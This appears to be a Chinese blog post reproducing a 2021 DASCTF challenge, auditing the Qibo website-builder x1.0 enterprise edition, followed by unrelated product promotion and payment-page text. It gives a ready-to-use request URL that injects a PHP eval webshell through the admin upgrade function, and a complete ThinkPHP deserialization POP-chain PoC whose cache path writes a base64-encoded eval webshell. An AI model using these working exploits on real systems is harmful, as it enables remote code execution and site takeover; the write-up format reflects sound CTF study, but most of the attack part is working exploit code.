[代码审计]齐博建站系统x1.0企业版代码审计

写在前面

复现2021 DASCTF July X CBCTF 4th赛题

齐博建站系统x1.0后台存在命令执行漏洞

漏洞点在于application/admin/controller/Upgrade.php下的sysup函数
在这里插入图片描述
跟入writelog,很有趣没有过滤进行直接拼接
在这里插入图片描述

写入的是php文件有点傻
在这里插入图片描述
因此我们直接访问

http://yyds.top/admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E// 

即可在runtime/client_upgrade_edition.php生成一句话木马
在这里插入图片描述

齐博建站系统x1.0企业版前台反序列化漏洞

application/index/controller/Labelmodels.php下的get_label方法
在这里插入图片描述
传个数组进去就行了,网上也有这个版本poc,当然肯定还有其他更好用的,懂得都懂

<?php
namespace think\process\pipes {
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
        }
    }
}

namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  //$this->parent=> think\console\Output;
            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error
            $this->error = $modelRelation;               // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\model\relation{
    class HasOne extends OneToOne {

    }
}
namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    //$query指向Query
            $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
        }
    }
}

namespace think\db {
    class Query {
        protected $model;

        function __construct($model)
        {
            $this->model = $model; //$this->model=> think\console\Output;
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; //$handle->think\session\driver\Memcached
        }

    }
}
namespace think\session\driver {
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            $this->handler = $handle; //$handle->think\cache\driver\File
        }
    }
}

namespace think\cache\driver {
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }

    }
}

namespace {
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
    echo urlencode(serialize($window));

}
齐博B2B系统是一款基于PHP程序和Mysql数据库为基础的开源B2B行业门户电子商务网站建站系统系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、及管理平台,是目前搭建B2B行业门户网站最好的程序之一。 齐博B2B具有的功能特点包括: 通行证整合功能 通过通行证的整合,可以与流行的PHPWIND论坛或Discuz论坛以及Ucenter中心等进行通讯,从而为用户提供更多的交流场所,增加网站的知名度; 会员自助建站功能 系统自带了多套会员(企业)模板供用户选择,而且安装简洁,使用方便; 功能强大的控制台 使用管理控制台,可以批量审核、修改、删除前台提交的所有信息,以及配置邮件、网站信息、行业和地区分类等; 丰富的B2B功能模块 系统不但拥有供求信息、产品库、公司库等常见的B2B功能,而且还可以安装齐博其它的模块; 强大的缓存功能 系统提供了数据库缓存、文件缓存、程序缓存功能,对使用频繁的数据进行了缓存之后,极大地改进拥有大数据量的网站的访问速度; 方便的广告管理以及发布功能 方便的广告管理以及调用,可以添加图片、文字以及Flash的图片轮换等广告形式,后台管理支持广告位与广告的编辑; 完善的会员中心管理平台 会员中心是提供会员管理产品、供求、企业资料的地方,拥有商业信息管理、产品信息管理、公司资料管理、业务往来信息管理等功能;
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值